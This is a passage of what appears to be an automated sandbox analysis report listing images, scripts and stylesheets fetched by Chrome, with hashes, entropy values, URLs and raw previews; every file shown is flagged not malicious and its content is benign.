                                              Size (bytes):7021
                                              Entropy (8bit):7.963138887931751
                                              Encrypted:false
                                              SSDEEP:96:F+nSzMCCcXuZ5HkwXWaPYo3wUF0vLK3gYtvSKX59Y1TY2O1eEbVhwsAERkb:CSzPCcXunkwTPR3wUFzRSKpt++V3AJb
                                              MD5:1C1EA7D94632993B0FECC9BDA375692D
                                              SHA1:4FF7974F3C7CB13DD7FF2EA50D364660FA361AA0
                                              SHA-256:D22BF0628B62B791D542907EAD37B6691F15D8ADABB0FDDECFDE85C62F1AB9DE
                                              SHA-512:0824946CDEEA3D6745B023CF1471F9254BEB176B05C9BD45ACDC4B0DAA30D716A3FB747CC20D956475BE59CC6E8D2CB69EA3F2968701727088FA7CFB140B8239
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........IH....:8h96eFG.=7g.@T...;9k;3i@;jCCx>:e..5DE}:7_>4n...64c>5c..@=....<>:o>5j37h........C.....SE..5;e.........4:o...G2d4;`.+UC..0._..W7/e61o...75U....t.4:Z..>.au9>i....AWL....%..%?.....81]..IC:t.......XnMM..CY..?..B@qB0_.....2..>?:`>....G=.....G4j..:.>M..L....BP;?v..2...27x.........0=iu...m...O\..J..../E.....5..>3y..,....s.EB...A.......VIF.IJx..1B<W.........1Q.[..7@.....>[..,.......?...C....,%Hsq.. \.._.........ZV..9Yed....QMn=)W|..1........HQ...i.../d}|.......+}..>\...[....VA^5h.'a[t%>pmPO....P..~........Od*)j....3s...IGh...L...`A..S....=...(.......V3V-...)VO5j...#..H4FVDK.qOXT.wu......m.$..M......;h.{{pm.V..)i...X..K.B.=.....^..........m<v)^..Q.....#9[..E....P..iV.w...^........M6...I..m........B.;^9Z.].........>k......Q........;.....(IDATh.._L.y..i3m..s..N)....L....).B..Pl...)%.P@$..h..T....Dj.Y4.D.D.Q.D\..k....g.E}`.......l...MK..>..8...g..g.....f..0...`P.4..56{...O..<.....]....`|.....X,.......?.c...c.M....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (4632)
                                              Category:dropped
                                              Size (bytes):31006
                                              Entropy (8bit):5.548029155315869
                                              Encrypted:false
                                              SSDEEP:768:qJhfJmZTlv2TmXEJ24mk/B4UnbjLeYX8iHMfBcv5mc5ajNeB1o0oAWYOxIFTWwrq:8BbvXQrNeG8y
                                              MD5:B3E361BAAD69070C65C4394FC804D91A
                                              SHA1:FD42AAFB6463713F2BE75A5B73F08DDDF4DF6CB4
                                              SHA-256:D8427421CEE0B7A9768B360DA1C8F81E6F49E5561AC44884B627C8070156C3E3
                                              SHA-512:0BD3D87BE1C52431A8B374D059364F8568ECA7343AC0CE2222B64DEF544D97731B86C8B3A49DC44E2EDFF0234A3C9CD91E1801B8CFCB9B0C88BC96E7D6E40679
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('onion', function(_){var gZa,hZa,iZa,WP,ZP,YP,lZa,mZa,nZa,kZa,oZa,aQ,pZa,qZa,rZa,uZa,wZa,xZa,zZa,AZa,DZa,FZa,HZa,KZa,GZa,IZa,MZa,JZa,NZa,fQ,gQ,eQ,hQ,SZa,TZa,iQ,UZa,VZa,jQ,WZa,XZa,kQ,c_a,b_a,nQ,h_a,i_a,j_a,g_a,k_a,m_a,pQ,q_a,r_a,s_a,l_a,n_a,o_a,t_a,u_a,oQ,D_a,E_a,H_a,G_a;gZa=function(a){a=_.kJa(a);if(!a)return null;var b=new VP;b=_.Yd(b,1,_.qD(String(_.Ec(_.Xg(a.Fg))),0));a=_.Yd(b,2,_.qD(String(_.Ec(_.Xg(a.Eg))),0));b=new eZa;a=_.qe(b,VP,1,a);return _.Kb(fZa(a),4)};hZa=function(a,b){_.Bg(a.Gg,1,b)};.iZa=function(a,b){_.Bg(a.Gg,2,b)};WP=function(){jZa||(jZa=[_.N,_.M,_.O])};ZP=function(a){_.LG.call(this,a,XP);YP(a)};YP=function(a){_.cG(a,XP)||(_.bG(a,XP,{entity:0,Ym:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],kZa()),_.cG(a,"t-ZGhYQtxECIs")||_.bG(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};lZa=func
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):4411
                                              Entropy (8bit):7.823584799722165
                                              Encrypted:false
                                              SSDEEP:96:i2pruOfed11JV1k5TQ/esyhJYmwVgauOstLp2QEVY1naF2:DruOWTo2/3yhyxc2HMaF2
                                              MD5:2EC9B069D98A49888506A37124DC03AA
                                              SHA1:7C0FB0D8385BC08EF8AF41D494CAD824F57F2B42
                                              SHA-256:001E793747B2ADCBBA36F437AB561F9FBF8D53A337D50E419BFAF34C088A887B
                                              SHA-512:D8BE17C5A164B1914CD687A693E7ABDD89AB5BB60FCA2BB5B142BB4B5F60C5D21F4F26637B1A6351D0C0712D3CA7DC82EFF831A5C7302CA3D6C77DB7BDA76FD4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5b4, 2022/05/09-08:25:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.4 (Windows)" xmpMM:InstanceID="xmp.iid:36708763F94811EC965CCA07EE966920" xmpMM:DocumentID="xmp.did:36708764F94811EC965CCA07EE966920"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:36708761F94811EC965CCA07EE966920" stRef:documentID="xmp.did:36708762F94811EC965CCA07EE966920"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?> ......IDATx....UU....b....""....*h....JM..a.. (. .@P .J......0>.H..E($%.jPP.Q..A.......w..9..s......o...~....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3155
                                              Entropy (8bit):7.911862254778413
                                              Encrypted:false
                                              SSDEEP:96:KsNXqXXe8gYj7nappMY0a9+7H/i6Tu/BQfbFX8l:KAqDgY3a339CHT6ot8l
                                              MD5:927B5D70D5561962F1CB99D16DFBFDEA
                                              SHA1:CCFF22FB7F4BE3C4889BB6B2B04E5D8D0AD2D786
                                              SHA-256:6F5A8822F51DF2BBAB7F10632D9A678E82155751D2972FEFC1C6681224886B17
                                              SHA-512:A83544FE8244576EFC7C7C0B420FB717ECF7A61D6D2F96670A94B330D979AB3CD253DDE894A4F9BC61632C540EE7345F360F9A3C4D9D0FE4CE94EFA55C8F717B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/google-workspace.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....A67.N....!........C84.SB..G..;..B......?52.X...8.V....G;......1.W).N...B.....:.Q.........@.....<......?1-.M;.UI~..!..D-J...<.....;1..........D<.I3.......3,....>..C6.g!.%+...I......>A........!....)".e^+.F...yo....QK;|...........<2...M.......L.d......,._......7$....xw...../..A.K.6H..v..?...7w.gi.~......G.7.`..+.,.1.k.<d.....QJ]o...V~Z...L.:.Fi.PS........}~........@U.......&.n...:U.#.....IDATh...W........!...HT ..e.y.A.....p.u^...v.........$.^.o.].H8.|.p.>....~./.....gX?..8.......1.......(@Q...........".ax.....T.y..x.....p....(...UX.W-D]..O.(....).$.g..j.@..$....Q._s...p~..I...:.......A.T....Dp..i.".p..yi{~mm...~%..3... ^Z.;.*,B.......Y.Z_l$....[u...5...Sx.x.........AUA.M...........VW..eI.......a4i.......J..d......zr...Y4y<......$..+....h.(.tz.p.....\.U.5...4.....@.s..8D.kR..E.........n..[A.......1..;H..nQ.....yH...g$.......;j.K..l.@..JPy}..1. .gu.^.C...(..m..>..vw.b...W...sH.Z.X.; ...|..JA.w...pP...t..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13798
                                              Entropy (8bit):7.636858848128382
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwyn1tj+OtVRTNsJIc2G8zde850s5l6HxpzPxFj+lJfstf:4YNg7wr+KzTzcf8zde850sYTHcJAf
                                              MD5:3721E85E5B34424496A02F4046322D6C
                                              SHA1:CD8D73A67AD84628545516C9FC9759611BEEB777
                                              SHA-256:C67BD59DF030003D678FD0642CA6CCEC3107F01613642A1117D87C24FB27E603
                                              SHA-512:1D721913227051DA206EBE3B09C4CB11370682D5CA20AD3BA722FAFAA1678EB7E2E4B76F34718D5E503BA9AA09E025F7362D4DA1969095D2354E852CAE1B2F5C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:GIF image data, version 89a, 1280 x 600
                                              Category:downloaded
                                              Size (bytes):476463
                                              Entropy (8bit):7.911164684387778
                                              Encrypted:false
                                              SSDEEP:12288:5tw1ViV/uJYdmHwbe/Q4LDGDIQYgU0Zyj:P+qmJAmQsdHihHo
                                              MD5:95A2E1F47C1A9205712580394F3F75CB
                                              SHA1:353EB8AE1FFB402AC7E7FC36385A8406A5AF5E63
                                              SHA-256:692B09E97BF580E7913ECC44AB1AEC4800CA76545F7CB8A080C83B4357479DCF
                                              SHA-512:9DCCC1025A3EA96C4D503DFBF656EA578B4F0051EED498B62A7E779C3F19B56EDDE179F877E85D9AF30299CAAB0FC39B47AB9E82EB99A81E5015230827512662
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/9/296e3d1f4ce8845a75130582a997c1a7.gif
                                              Preview:GIF89a..X....xxxwwwuuu...vvv...ttt............sss..................yyy.........rrr.....................................................qqqppp.............................................zzz.........{{{..........................nnn...ooo...~~~........................mmm...}}}...|||...YYYllljjjiii[[[...ZZZkkk......VVVXXX___```aaaccc\\\bbbWWWdddUUU]]]hhhfffeeeggg...^^^TTT.........SSSRRRPPP777...QQQ...OOO666NNN888JJJAAAKKK...MMMLLL...CCC???HHHIIIDDDBBB@@@.........===>>>EEE<<<FFFGGG......;;;:::...555999333444...222111...........................///000,,,---...+++***)))((('''...&&&%%%$$$...""" .........!!!......###..................................................................................................................................................................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):9941
                                              Entropy (8bit):7.428805450862958
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwarb7XSqRpN1M35LdOIyA4fuXuyiy2:4YNg7arbLSgpN1MxsI5+yg
                                              MD5:8EA412BF2F67B0E50952495478C36E11
                                              SHA1:EA6F54ECE605DBBC1C55018D7D4A3670B5E8DF5E
                                              SHA-256:485BD9E95EC5E81D7D5543C4977AF97D40F2C3337B6B468F6B320007934E7077
                                              SHA-512:55870194658131C3534DDEA4C1C5ECD82D696281A6BCE18FBDC89F44BADB52ADE6140329E4BA28D56BC0DEC4135CE1F2A89008010B675EAE949185524ACF7D50
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):302
                                              Entropy (8bit):5.4357451956521
                                              Encrypted:false
                                              SSDEEP:6:U+4OUr940FFpFM+56ZRWHTizlpdUDUfPtxVk1mq:UJO6940FFMO6ZRoT6pSunqwq
                                              MD5:A61BAD8B26EF8914546AED6B68CCF7A3
                                              SHA1:AA77241CCEDDDBCBFB19BA28E07DE8280E1F1CBF
                                              SHA-256:9E06028665131F0A17F015003AC578BA216CE432EB0A6B787A7A1153F4A9721B
                                              SHA-512:D6A76313258E5B0DF752E6E7F3D98478C6D09619F8A444B2A8B0771385D04028A42091E01301EAA1A47D86F4BD9A3E2698A13D709D95D63937F607C944CB5622
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.googleapis.com/css?family=Google+Sans+Text:400&text=%E2%86%90%E2%86%92%E2%86%91%E2%86%93&lang=en
                                              Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/l/font?kit=5aUu9-KzpRiLCAt4Unrc-xIKmCU5mEhkgo3FI_E8lH570oBdIw&skey=b20c8ebc9802c116&v=v22) format('woff2');.}.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):71512
                                              Entropy (8bit):7.996885481855253
                                              Encrypted:true
                                              SSDEEP:1536:LfKmPWy4jGj0L5X95+n45/t1TwhZzgOIo8hsrW6voI8+3/DorqpI7:zKmP86w3ZNPQZzgObhoIf7orqq7
                                              MD5:87A0F920488D09A118316DF7C6427345
                                              SHA1:33DB546E8805AE2176B3D854A02FBEFC2D59D30A
                                              SHA-256:B89E91FBB60406E1DC395A6E22E4533C3E5E8BF26E74A06BDEBB6DDAB4D4F0D7
                                              SHA-512:E02F25B08AA828343BC47AAFC4A53DD6D61C69DD1665B4EE0F12F21631CDBD692D6EAD78775BF7DF9E9E502A0DBDC357647957C1254CCC6348710AB5F3915201
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/29/8814c125f673212d4b4567019722294a.webp
                                              Preview:RIFFP...WEBPVP8X..............VP8 ....p....*....>.n.R.&73.6....gn.....S.:......sk.7..D....U..<f|.Y...7.......X.+....`.6...._.7....<_..G..F...=.4..M0....4..v....s..../..s>..G...v..-.?..W..].;U....A...y.E......>......PN.J.yCxR.........d...OV..%..c. ...4..j.....W..F (Y..-...;p*l..D...~9.0dQ%'.~.."pf<...u..t...?.7Q.b..$..b.*..J...S....F#P....)$H..~.B...N.2f.=.>e.....]v..6. ..]{h>.....Y.....m...7......G1.T..W=K'..%t..>q.-.7l.B....D.=..........=Bi......+5.#.......Y..Y.....a...._Q.}...w.C...!.........Y...&.*....$}f.'...k..+..&.0G...O..8S...a.R.....h[G.c.W..[....,$o..Z...{.m*.W.p......\.....3...P..4E....r.....<.E&..p.L...@.u:W)..!..Zf.N.....\..h:~....#.,..H.5.>.....YM^~..mhB6.'...9z...-7.<.W}<...i..6zh..."._......_..peL..*..&...j......2.7..(.`Ao.A.\Wv.i;.........h8..:..N\3..W.....(....y...w.8r.".....b._....V..w...y...%&...3.....8.u._.....CZ... .B.....n.v.}F....0..v..@.EH?8..Kp.X..5\A..5...bW....w....D..T..?$.."...=h=....`.n.;8]-..2S&
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5431
                                              Entropy (8bit):7.885300755099399
                                              Encrypted:false
                                              SSDEEP:96:2KnV51VhRN2XcWubQv1yP57mPBpO9jxwgkzznTKtihRU1KVmNzxL:Z5jngXqy1y5mZA9rkzKtL1+mJxL
                                              MD5:4A4D662527FD7371F118067056863436
                                              SHA1:49ADFA9AD8C45768428FC4BB96D2CB352D2A46DF
                                              SHA-256:4FED6CFA3875C183042C6A7EF35E681FA58ACB9A765C3A652AD1C5EE2886B7D3
                                              SHA-512:14B45DA26FD7137712A8DBF3B5E5BAF8D52152C4FFD8F3C0415F83A1A2350F4321307337F98A513714B7FA2439B26E5141F061B7D4410838D0F22FCE16360928
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5b4, 2022/05/09-08:25:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:70AA7084FC3311ECA65CA117B0A14322" xmpMM:InstanceID="xmp.iid:70AA7083FC3311ECA65CA117B0A14322" xmp:CreatorTool="Adobe Photoshop 23.4 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A260C674F94611EC8F2ACA399A1C8BAB" stRef:documentID="xmp.did:A260C675F94611EC8F2ACA399A1C8BAB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.\.....IDATx..\y...y..>ffwvW..@."!..]1.$v.. ..NL.......E...."'..$.L.1eQ.!.........1q...ua...:,$.....t....3..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6585
                                              Entropy (8bit):7.964245268395849
                                              Encrypted:false
                                              SSDEEP:192:BaJS0Q9u3GPHZz7HWMrDwKlluY3VXWbtAy:EJl85zykwKllb3VGbuy
                                              MD5:1088D05881DF1BCE499F9FA184BFC4FD
                                              SHA1:BBA7126B468FAD2B58353BC4D09A6CC36B7F0A48
                                              SHA-256:4579BB153E2FE5D136A586583AC70DC42A0F99895615B88B83788D397E95B766
                                              SHA-512:9D55E067813E0141F9D36274A286E86A0A2352DA65352C7E4900A7FD4B943D95E7E2736E8C4777E8C434DFBC7976589CCB77CA6932DB037B825E280CCBCC63A8
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...=PLTE.............................................C...........8....................6..2........................9...}..............K...............G................?..8...............x........;...k..{.......................4..........!......m..<..*....x....,..T......|...z.......4t.............|..........c....................[....uC..(....Q..2...wq.....H....).....+...1.................'......f;.............T....n.-w..gy~.._...a....~.!............]..d3........P...}......F.{..it....K..M..].qE....7.4.....D....q..s...G.....z..|B.Y#...."...7IDATh...O....\.{`.....r.3..$..i..2.6........6m...5ib.a.........v.j.6.....P..MN\.##...g=k....71BB*.)...B*.._...T!|).I....~7!R..d..P#.G..p.h....\..-"+...P(.........Ex".....7.....Q...3.-....&|.d..G...|#...'..1'.^..u. *....!..T...NA.A.Ih.Ja#.4..Q.t.z.T8...'..L.5H$.~D.W?$...Ne.eb.M.*R.ABiHx.*.Ea...T...^.+...@.... .(.).S.7.M.UD..bNe..h.....%1.'....%.....P.\&?F...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):9296
                                              Entropy (8bit):7.362957719049136
                                              Encrypted:false
                                              SSDEEP:96:pN26MT0D5MdtbZPAVwzVQXw+4o3IN1ltZxud2eR3KdHLNOqsoDeyNzuEBkz1yXxu:4YNMtKw6dV0zuAeRadHLNtDvluENmDHX
                                              MD5:A51D5F70091F86A5C657FE69FA04DCFE
                                              SHA1:37F1CB715F6C33204970DC7812BEFDDEC04C2187
                                              SHA-256:A32E6E24197F2D82A60BDAAD03560CCD5AD0A72F612E3D9FE08899D7B974B185
                                              SHA-512:D10555CFF02EFCB11A707372B45CC3E32DDD5E08D20BED6ECCE8339AB24776878F10C776AC4B68CD701B19ED0D953F073E4A3A91F4423477F9E9CBC980BBC7EF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/9/ba35dd9ef75a444543762270f7d91e57.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (543)
                                              Category:downloaded
                                              Size (bytes):120870
                                              Entropy (8bit):5.4575471164937355
                                              Encrypted:false
                                              SSDEEP:3072:LQK1aO3dKplMGqy2ETMoojAZ1TiEyurrkQ0Fuf:0SF3dKp+GqyHTMoojAZ1TiEyurrkQ0FK
                                              MD5:A08CCAE580D68E61749A4F108AF246D7
                                              SHA1:52D8EA25808764F8BB0023D05172CE68659C92F4
                                              SHA-256:F3811A81A2BBF1513B652DED3FD2E4BD00457536238C5F47185C81FE57C06D16
                                              SHA-512:DA9DFDCDBBA510AC71F13A3B33C8B06C71725FF5C5C6448F481BB217F31132CEE6E97CEB3A42F9A3173C4521853FBD6D31580FBF466A5598C58EEDBE982D9D0E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/26636eff/player_ias.vflset/en_US/remote.js
                                              Preview:(function(g){var window=this;'use strict';var d7=function(a){g.xk(a,"zx",Math.floor(Math.random()*2147483648).toString(36)+Math.abs(Math.floor(Math.random()*2147483648)^g.Ya()).toString(36));return a},e7=function(a,b,c){Array.isArray(c)||(c=[String(c)]);.g.iha(a.D,b,c)},Erb=function(a){if(a instanceof g.jn)return a;.if(typeof a.Im=="function")return a.Im(!1);if(g.Ra(a)){var b=0,c=new g.jn;c.next=function(){for(;;){if(b>=a.length)return g.p1;if(b in a)return g.kn(a[b++]);b++}};.return c}throw Error("Not implemented");},Frb=function(a,b,c){if(g.Ra(a))g.kc(a,b,c);.else for(a=Erb(a);;){var d=a.next();if(d.done)break;b.call(c,d.value,void 0,a)}},Grb=function(a,b){var c=[];.Frb(b,function(d){try{var e=g.Jp.prototype.B.call(this,d,!0)}catch(f){if(f=="Storage: Invalid value was encountered")return;throw f;}e===void 0?c.push(d):g.mma(e)&&c.push(d)},a);.return c},Hrb=function(a,b){Grb(a,b).forEach(function(c){g.Jp.prototype.remove.call(this,c)},a)},Irb=function(a){if(a.oa){if(a.oa.locationOverri
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:assembler source, ASCII text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):3310
                                              Entropy (8bit):4.811881328271445
                                              Encrypted:false
                                              SSDEEP:48:UZBdmOFW0tqmIq4H4LAaKG4zq4z/qEjqZqOd0mjaFW0teTVbbUvhYiThTVbZ3FZ+:UZB/Fy5kArzZz/Tq7zjaF2OZvFZ+
                                              MD5:D3A383EE3D7093EF44AC42318187060A
                                              SHA1:319F49AEA57876CDC7BA5D2B3E090B91230E8BB4
                                              SHA-256:602C1D3F7ABB365C3A938FBD8999F7006CDD110C30FAB44BD5E1BBCB788D865D
                                              SHA-512:D26879E9B7C2301268920004AD0172DA97DF6F9EEF7A377EE70918BAB230695F4D89212A6ACB3F6A5F7EBFC173B1A3387CD642D97C3101CDC681665DD9F02C11
                                              Malicious:false
                                              Reputation:low
                                              URL:https://pdf-online.on-fleek.app/styles.css
                                              Preview:body {.. font-family: Arial, sans-serif;.. background-color: #f4f4f4;.. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. margin: 0;.. position: relative;.. overflow: hidden;..}.....background {.. position: fixed;.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. z-index: -1; /* Ensure it's behind other content */..}.....pdf-background {.. width: 100%;.. height: 100%;.. object-fit: cover;.. filter: blur(10px); /* Optional: Apply blur effect */..}.....pdf-container {.. background-color: white;.. padding: 20px;.. border-radius: 10px;.. box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);.. text-align: center;.. width: 300px;.. position: relative;.. z-index: 1;..}.....pdf-header {.. display: flex;.. align-items: center;.. justify-content: center;.. margin-bottom: 20px; /* Add space below the header */..}.....pdf-icon {.. width: 47px;.. height: 50px;.. margin-righ
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14654
                                              Entropy (8bit):7.677629504656761
                                              Encrypted:false
                                              SSDEEP:384:4YNg72bmrXR56qw09ZHUStbTrw0aulHu9JOZsqD:4YyqqLR56leTVa8uoeS
                                              MD5:4733A5EA143B94A0EAFB2958B983B189
                                              SHA1:0ECB1F8C9DF6FC9285586941E62925AD07DCE05A
                                              SHA-256:F567AC6F16FC30D4B8FEE65866AF983063689612EF2903A1310CAA2FD505F6BC
                                              SHA-512:220EA277C2ED15117BA9D15C9B270327A6148C7B5BFF14A95CCF5DEEE3A3B98473045326A33DAE127620CE2814B29E6DC0A37DC2362AB40A6D135ADBA41EA70D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/72/bf073c5d3408dd51e0100e4dbc55ba72.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16043
                                              Entropy (8bit):7.700760233335113
                                              Encrypted:false
                                              SSDEEP:384:4YNg7h5M58pSZ6zmqIWfzfwunqt6s5PgMPjgl9oK:4YyV57SqIuzfwunKLMlp
                                              MD5:A8CF128E669AB85F78112B10DA7319BA
                                              SHA1:DFD2A80E6B0AF83658FD8D0022AA19AC1F62C381
                                              SHA-256:D9B2970289EC272F3F46B435AC126F1CBACB9903B02507602882A6747A7343D3
                                              SHA-512:DA16CB4C2C57FF577CF0EFDC37E79E80C60976DAD64E5C4E04C0B66246E384E7EBA481B6F4D46B777CC27CC95CEBDD2938FEA6780AA4D8112717871F51E4FDCF
                                              Malicious:false
                                              Reputation:low
